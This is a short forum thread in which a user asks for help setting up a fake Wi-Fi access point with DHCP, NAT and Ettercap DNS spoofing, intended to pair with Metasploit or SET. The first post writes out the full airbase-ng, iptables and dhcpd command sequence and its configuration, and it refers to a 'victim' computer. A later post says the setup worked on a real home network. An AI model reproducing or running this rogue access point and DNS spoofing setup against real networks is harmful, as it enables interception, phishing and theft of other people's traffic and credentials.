Results 1 to 3 of 3

Thread: Fake ap + dns spoof + msfconsole / se-toolkit ... Help

  1. #1
    Join Date
    2014-Feb
    Location
    Italy
    Posts
    3

    Fake ap + dns spoof + msfconsole / se-toolkit ... Help

    Hello to all,
    I'm new I would like to create a FAKE AP + + DNS_SPOOF msfconsole, can someone help me?

    CREATE FAKE AP


    ----------------------------------------
    CODE
    ----------------------------------------
    airmon-ng start wlan0
    airbase-ng -e "Evil Wi-Fu" -c 11 mon0
    ifconfig at0 10.0.0.254 netmask 255.255.255.0
    ifconfig at0 up
    ifconfig eth0 up && dhclient3 eth0
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254
    ./iptables-flush.sh
    iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
    dhcpd3 -d -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0
    echo 1 > /proc/sys/net/ipv4/ip_forward

    ------------------------------------------------------------------
    /etc/dhcpd3/dhcpd.conf
    ------------------------------------------------------------------
    dens-update-style ad-hoc;
    default-lease-time 600;
    max-lease-time 7200;
    authoritative;
    subnet 10.0.0.0 netmask 255.255.255.0 {
    option subnet-mask 255.255.255.0;
    option broadcast-address 10.0.0.255;
    option routers 10.0.0.254;
    option domain-name-servers 8.8.8.8;
    range 10.0.0.1 10.0.0.140;
    }
    -----------------------------------------------

    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -P FORWARD ACCEPT

    -----------------------------------------------

    ETTERCAP with removal of # and privileges changed to "0" (etter.conf)

    change my IP (etter.dns)

    then activate plugin and start dns_spoof MITM

    -------------------------------------------------------

    I then turned on apache and I tried to go with the victim's computer at google.com, but does not appear " it's works " of APACHE


    thanks for your attention.

  2. #2
    Join Date
    2013-Mar
    Location
    http://rastamouse.me
    Posts
    86
    Which distro are you using? This looks like some of the steps I published a long time ago for BackTrack, which won't work on Kali. I see you've double posted in another Thread as well - I suggest building on the method zimmaro demonstrated, and perhaps provide some more information about which steps don't appear to work for you.
    OSCP
    --
    If it smells like a duck, walks like a duck and quacks like a duck; then it probably is a duck.

  3. #3
    Join Date
    2014-Nov
    Posts
    3
    Hi my distro is Kali Linux 1.0.9
    It's work very well at my parents home, but if I try to my house it seem to work finelly but when I try browse any website i cannot view anything, while if i browse web sites with ip address i can see any web pages. I'm thinking it might be something at the router or firewall that does not target dns.
    any idea?
    Thanks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •